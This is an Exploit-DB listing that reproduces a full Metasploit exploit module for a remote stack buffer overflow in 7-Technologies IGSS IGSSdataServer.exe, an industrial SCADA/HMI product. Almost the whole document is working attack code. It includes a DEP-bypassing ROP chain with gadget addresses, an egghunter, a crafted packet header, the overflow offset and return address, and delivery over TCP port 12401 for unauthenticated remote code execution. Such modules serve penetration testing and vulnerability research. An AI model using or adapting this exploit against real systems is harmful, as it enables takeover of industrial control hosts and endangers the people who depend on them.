7-Technologies IGSS 9.00.00 b11063 - 'IGSSdataServer.exe' Remote Stack Overflow (Metasploit)

EDB-ID:

17300




Platform:

Windows

Date:

2011-05-16


##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Tcp

	def initialize(info={})
		super(update_info(info,
			'Name'           => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",
			'Description'    => %q{
					This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
				IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
				fails to do proper bounds checking before copying data into a small buffer on the stack.
				This causes a buffer overflow and allows to overwrite a structured exception handling record
				on the stack, allowing for unauthenticated remote code execution.
			},
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 12639 $',
			'Author'         =>
				[
					'Luigi Auriemma', #Initial discovery, poc
					'Lincoln',        #Metasploit
					'corelanc0d3r',   #Rop exploit, combined XP SP3 & 2003 Server
					'sinn3r',         #Serious Msf style policing
				],
			'References'     =>
				[
					['CVE', '2011-1567'],
					['OSVDB', ''],
					['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => 'process',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
						{
							'Ret'    => 0x1b77ca8c,  #dao360.dll pivot 1388 bytes
							'Offset' => 500
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "March 24 2011",
			'DefaultTarget'  => 0))

			register_options(
			[
				Opt::RPORT(12401)
			], self.class)
	end

	def junk
		return rand_text(4).unpack("L")[0].to_i
	end

	def exploit

		eggoptions =
		{
			:checksum => false,
			:eggtag => 'w00t',
			:depmethod => 'virtualprotect',
			:depreg => 'esi'
		}

		badchars = "\x00"
		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

		#dao360.dll - pvefindaddr rop 'n roll
		rop_chain = [
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b7681c4,  # rop nop
			0x1b72f174,  # POP EAX # RETN 08
			0xA1A10101,
			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08 
			junk,
			junk,
			0x1b73a55c,  # XCHG EAX,EBX # RETN
			junk,
			junk,
			0x1b724004,  # pop ebp
			0x1b72f15f,  # &push esp # retn 8
			0x1b72f040,  # POP ECX # RETN
			0x1B78F010,  # writeable
			0x1b7681c2,  # xor eax,eax # retn
			0x1b72495c,  # add al,40 # mov [esi+4],eax # pop esi # retn 4
			0x41414141,  
			0x1b76a883,  # XCHG EAX,ESI # RETN 00  
			junk,
			0x1b7785c1,  # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C 
			junk,
			junk,
			0x1b78535c,  # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
			junk,
			junk,
			junk,
			junk,
			0x1b7280b4,  # POP EDI # XOR EAX,EAX # POP ESI # RETN
			junk,
			junk,
			junk,
			junk,
			0x1b7681c4,  # rop nop (edi)
			0x90909090,  # esi -> eax -> nop
			0x1b72f174,  # POP EAX # RETN 08
			0xA1F50214,  # offset to &VirtualProtect
			0x1b7762a8,  # ADD EAX,5E5F0000 # RETN 08
			junk,
			junk,
			0x1b73f3bd,  # MOV EAX,DWORD PTR DS:[EAX] # RETN
			junk,
			junk,
			0x1b76a883,  # XCHG EAX,ESI # RETN 00
			0x1b72f040,  # pop ecx
			0x1B78F010,  # writeable (ecx)
			0x1b764716,  # PUSHAD # RETN
		].pack('V*')

		header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
		header << rand_text(14)
		sploit = rop_chain
		sploit << "\x90" * 10
		sploit << hunter
		sploit << rand_text(target['Offset'] - (sploit.length))
		sploit << [target.ret].pack('V') 
		sploit << egg
		sploit << rand_text(2000)

		connect
		print_status("Sending request...")
		sock.put(header + sploit)
		handler
		disconnect

	end

end